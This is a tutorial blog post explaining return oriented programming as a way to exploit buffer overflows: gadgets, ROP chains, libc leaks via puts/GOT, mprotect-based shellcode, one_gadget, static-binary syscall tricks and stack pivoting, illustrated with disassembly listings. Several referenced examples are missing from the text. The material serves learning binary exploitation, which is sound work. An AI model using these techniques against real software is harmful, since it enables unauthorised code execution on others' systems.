English
Probably the most famous CWE in the world, buffer overflows can be exploited in numerous ways, one of those being return oriented programming. In this post, I will be explaining the different ways to exploit a buffer overflow with return oriented programming.
1. Prerequisites
Like many other binary exploitation techniques, knowledge on how assembly works is very useful. In order to understand what I will be explaining in this post, it is recommended to know:
- Buffer overflows
- Registers, especially the stack pointer
- Function calls in assembly
- Pointers
2. Return oriented programming in a nutshell
Return oriented programming (ROP) is exactly what it’s name implies, programming by returning. Every call
instruction in assembly does two things, it pushes the next instruction’s address to the stack, and modifies the value of the instruction pointer to what is determined. Almost every call
instruction is paired with an upcoming ret
instruction. This instruction pops whatever value is in the stack and places it’s into the instruction pointer.
This is the main goal of return oriented programming. If the attacker can change the value that was previously placed into the stack, say with a buffer overflow, they can gain access to change the value of the instruction pointer to whatever they want.
3. Gadgets
Common terminology used in exploiting return oriented programming is gadgets. Gadgets are small pieces of code that end in a ret
instruction. Here is a few examples, you can find these in any old elf binary.
Gadgets are used to create what is called a ROP chain.
3.1. Finding gadgets
In the above example, a tool was used to find the gadgets. Examples of tools that can be used are ropper and ROPgadget
4. ROP chains
A ROP chain is a series of gadgets used by the attacker in order to run pieces of code consecutively, in order to modify registers or data in the stack, heap, or bss. ROP chains can be accomplished because most gadgets end in the ret
instruction. Because of this, by placing two or more gadget addresses in the stack, after the first gadget is done executing, execution will continue to the next gadget address located in the stack. Here’s an illustration of a ROP chain (source):
If you are still confused, go ahead and watch this video from LiveOverflow. I hope it helps.
5. Techniques to exploit ROP
By now you probably understand how ROP works, and what ROP chaining is. That itself isn’t enough to RCE though, so I will show you the techniques I know to exploit ROP
1. Jumping to a function
Sometimes, instead of jumping to small pieces of code, jumping to an entire function can be useful. Since (almost) all functions end with a ret
instruction, creating ROP chains is still possible
2. Set the functions parameters
Most functions require parameters in order to function properly. However, for 32-bit and 64-bit architectures, the location in which the parameters are stored is different
- For 32-bit, the function parameters are stored in the stack, directly after the return address
- For 64-bit, the function parameters are stored in 6 registers, which are rdi, rsi, rdx, rcx, r8, and r9. If the function requires more than 6 parameters, the remaining parameters will be stored in the stack
3. The problem with 32-bit
When jumping to a function in a 32-bit binary, the parameters are stored in the stack. This can interfere with our ropchain because function parameters most likely are not valid addresses to executable area. However, there is a solution to this problem, which is creating a payload as such:
(function to return to) + (address where buffer overflow is located) + (function parameters)
With a payload like this, after the function is done executing, execution will return to the function where the buffer overflow is located. Then, we can exploit the buffer overflow again, and create a brand new ROP chain.
4. The problem with 64-bit
When jumping to a function in a 64-bit binary, the first 6 parameters are located in registers. Registers are not stored in the stack, but they are stored in a seperate location in your machine. Because of this, we can’t use the buffer overflow directly to change the register values. However, like in 32-bit, there is a solution.
In every binary compiled with gcc, there is a certain function called __libc_csu_init. This function is sort of like a constructor for your entire program. You can learn more about it here. Let’s see if we can find a useful gadgets in this function.
0x0000000000400710 <+0>: push r15
0x0000000000400712 <+2>: push r14
0x0000000000400714 <+4>: mov r15,rdx
0x0000000000400717 <+7>: push r13
0x0000000000400719 <+9>: push r12
0x000000000040071b <+11>: lea r12,[rip+0x2006ee] # 0x600e10
0x0000000000400722 <+18>: push rbp
0x0000000000400723 <+19>: lea rbp,[rip+0x2006ee] # 0x600e18
0x000000000040072a <+26>: push rbx
0x000000000040072b <+27>: mov r13d,edi
0x000000000040072e <+30>: mov r14,rsi
0x0000000000400731 <+33>: sub rbp,r12
0x0000000000400734 <+36>: sub rsp,0x8
0x0000000000400738 <+40>: sar rbp,0x3
0x000000000040073c <+44>: call 0x400498 <_init>
0x0000000000400741 <+49>: test rbp,rbp
0x0000000000400744 <+52>: je 0x400766 <__libc_csu_init+86>
0x0000000000400746 <+54>: xor ebx,ebx
0x0000000000400748 <+56>: nop DWORD PTR [rax+rax*1+0x0]
0x0000000000400750 <+64>: mov rdx,r15
0x0000000000400753 <+67>: mov rsi,r14
0x0000000000400756 <+70>: mov edi,r13d
0x0000000000400759 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>: add rbx,0x1
0x0000000000400761 <+81>: cmp rbp,rbx
0x0000000000400764 <+84>: jne 0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>: add rsp,0x8
0x000000000040076a <+90>: pop rbx
0x000000000040076b <+91>: pop rbp
0x000000000040076c <+92>: pop r12
0x000000000040076e <+94>: pop r13
0x0000000000400770 <+96>: pop r14
0x0000000000400772 <+98>: pop r15
0x0000000000400774 <+100>: ret
It might seem like there isn’t much, but this function has a very important gadget. The pop r15
and pop r14
instructions both consist of two bytes. Let’s see what they are.
0x400770 <__libc_csu_init+96>: 0x41 0x5e
0x400772 <__libc_csu_init+98>: 0x41 0x5f
They both contain 0x41, but the latter is what is really interesting. Let’s assemble them.
0x400771 <__libc_csu_init+97>: pop rsi
0x400773 <__libc_csu_init+99>: pop rdi
Well that’s interesting. Now we have two gadgets, both in a function that is almost always present, which allows use to control the first two parameters of a function. For the other 4 gadgets, gadgets such as these ones are quite rare, but functions that need 6 parameters is also not very common.
5.1. The problem with 64-bit, part 2
Later in this post, I will talk about calling mprotect. But before that, it is required to know that mprotect needs 3 parameters, which are address, length, and prot. Just before we learnt an easy way to control the first two parameters of a function, using __libc_csu_init, but we haven’t controlled the third function parameter, which is stored in the rdx
register. There is actually a gadget we can use, found in __libc_csu_init:
0x0000000000400750 <+64>: mov rdx,r15
0x0000000000400753 <+67>: mov rsi,r14
0x0000000000400756 <+70>: mov edi,r13d
0x0000000000400759 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040075d <+77>: add rbx,0x1
0x0000000000400761 <+81>: cmp rbp,rbx
0x0000000000400764 <+84>: jne 0x400750 <__libc_csu_init+64>
0x0000000000400766 <+86>: add rsp,0x8
0x000000000040076a <+90>: pop rbx
0x000000000040076b <+91>: pop rbp
0x000000000040076c <+92>: pop r12
0x000000000040076e <+94>: pop r13
0x0000000000400770 <+96>: pop r14
0x0000000000400772 <+98>: pop r15
0x0000000000400774 <+100>: ret
Unlike other gadgets, this gadget is far from a ret
instruction. Also, there are other things to be weary about like the call
instruction and the jne
instruction. To pass them, you can set r12 + rbx*8
to an address that is only the ret
instruction, and set rbp
to the according rbx
+1. Also the add rsp, 0x8
can sometimes be problematic.
Now that you can control the first three parameters of a function, you can call functions like mprotect, execve, fgets and more. But ofcourse calling those functions require knowing their respective addresses.
6. Leaking addresses
Now that we know the basics, let’s get started to try and create an arbitrary read.
I expect you as the reader already know about ASLR, if you dont go and have a read. ASLR by default is active on most machines, and by default it randomizes stack, heap, and libc addresses. However, the addresses of executable code and bss is only randomized if the protection PIE is enabled. For some binaries, this protection is disabled, this grants us access to ROP gadgets, Global Offset Table (GOT) and Procedure Linkage Table (PLT). If you don’t know about GOT and PLT, here is a video from LiveOverflow that you can watch.
For most binaries, they will have a way to print text onto the screen. This can be done with the function puts, printf, or even write. In any case, these functions can be used to print data from (almost) any address in the binary. Using a ROP chain, we can abuse this in order to get libc and/or stack addresses.
Here’s an example, in this binary we have a buffer overflow and we can change the return address. I’ll set the return address to the the address of the puts PLT, and I’ll set the first parameter to be the address of puts GOT.
Boom we got a libc address, more specifically the address of puts. Now we can do a calculation to get the value of the system, and eventually get a shell.
7. Shellcoding
Almost always, every binary has the W^X protection. This prevents writing new executable code during runtime, since bad things could happen ofcourse. However, certain functions in libc can change the permissions of any block of memory, one of these functions being mprotect. Mprotect takes three parameters, which are address, length, and prot. Since we can effectively control the first three function parameters, we can call this function and change the permissions of certain blocks of memory.
Here’s an example, in this binary I’ll change the bss area from rw- to rwx. By using functions like fgets, we can write shellcode to that area and then jump to it.
8. One gadget RCE
The tricks before both required the attacker to setup function parameters before calling the functions. But as it turns out, there are certain pieces of code located in libc that can be used to invoke a shell without having to set any function parameters. However, there are certain constraints that must be satisfied before being able to use them. The contraints usually consists of setting up registers and memory locations in a certain way.
To find these gadgets, a tool called one_gadget can be used. Here’s an example of me using one_gadget:
9. Static binaries
In some cases, binaries will be compiled statically instead of dynamically. As a result of this, PIE protection will never be enabled (at least for nasm), however certain libc functions such as system won’t be available for use.
In this case, there are two things I like to do, which is call the function _dl_make_stack_executable, or invoke a syscall by only using gadgets.
9.1. _dl_make_stack_executable
In statically linked binaries, there is a certain function called _dl_make_stack_executable. This function can invoke a syscall to make the permissions of the stack become rwx, but it requires two conditions to be satisfied. Let’s look in the disassembly:
0x00000000004717e0 <+0>: mov rsi,QWORD PTR [rip+0x250a49] # 0x6c2230 <_dl_pagesize>
0x00000000004717e7 <+7>: push rbx
0x00000000004717e8 <+8>: mov rbx,rdi
0x00000000004717eb <+11>: mov rax,QWORD PTR [rdi]
0x00000000004717ee <+14>: mov rdi,rsi
0x00000000004717f1 <+17>: neg rdi
0x00000000004717f4 <+20>: and rdi,rax
0x00000000004717f7 <+23>: cmp rax,QWORD PTR [rip+0x24f78a] # 0x6c0f88 <__libc_stack_end>
0x00000000004717fe <+30>: jne 0x47181f <_dl_make_stack_executable+63>
0x0000000000471800 <+32>: mov edx,DWORD PTR [rip+0x24f7da] # 0x6c0fe0 <__stack_prot>
0x0000000000471806 <+38>: call 0x435690 <mprotect>
0x000000000047180b <+43>: test eax,eax
0x000000000047180d <+45>: jne 0x471826 <_dl_make_stack_executable+70>
0x000000000047180f <+47>: mov QWORD PTR [rbx],0x0
0x0000000000471816 <+54>: or DWORD PTR [rip+0x2509f3],0x1 # 0x6c2210 <_dl_stack_flags>
0x000000000047181d <+61>: pop rbx
0x000000000047181e <+62>: ret
0x000000000047181f <+63>: mov eax,0x1
0x0000000000471824 <+68>: pop rbx
0x0000000000471825 <+69>: ret
0x0000000000471826 <+70>: mov rax,0xffffffffffffffc0
0x000000000047182d <+77>: pop rbx
0x000000000047182e <+78>: mov eax,DWORD PTR fs:[rax]
This is a 64-bit executable, so the function parameters are stored in registers. Looking carefully, It seems that if rdi is set to the address of __libc_stack_end and if __stack_prot is set to 7, we can get a call to mprotect.
9.2. Syscall gadgets
The other trick I like to do is to create a ropchain in such a way that we can invoke a syscall. This means in 64-bit, I have to set rax, rdi, and rsi and also jump to a syscall
instruction. In 32-bit, I have to set eax, ebx, and ecx and also jump to a int 0x80
instruction. This may seem hard, but it’s actually easier than calling _dl_make_stack_executable.
10. Stack pivoting
The last trick I will be explaining is stack pivoting. Basically, what we percieve as the “stack” is actually just an abstract concept. The stack is basically the area of memory in which the stack pointer is pointed to. If we can change the value of the stack pointer to point to a different location in memory, then we can say that new location is the “stack”.
What good does this do for us? Well in some binaries the ropchain we can make can be limited, say 2-3 chains at a time. In this case, for 64-bit binaries changing rdi
and jumping to puts and back to main won’t be possible.
But what if in a different location we could write a long chain. Say, bss? Or maybe even the heap? But to be able to use this location as a rop chain, we need to set the stack register’s value to point to it. In this case, we could try and find an instruction like mov rsp, rax
, but it’s almost never present is dynamically linked binaries.
Instead of generic instructions like that, we can use an unexpected one, leave
. According to the Nasm docs, leave
does two things, mov esp, ebp
and then pop ebp
.
As you know, the base pointer is located right before the return address, so we can corrupt it everytime we want to corrupt the return address. But instead of jumping to functions, by jumping to another leave; ret
gadget, we can pivot the stack to another location in memory.
Let’s look at an example, in this binary, I’ve created a ropchain in the heap, and have also gotten a heap leak. I’m going to pivot the stack on to the heap and get a longer ropchain.
6. Final words
In conclusion, ROP is a very exploitable vulnerability. This isn’t the end for ROP, as there are still techniques such as ret2dl_resolve, SROP, and more.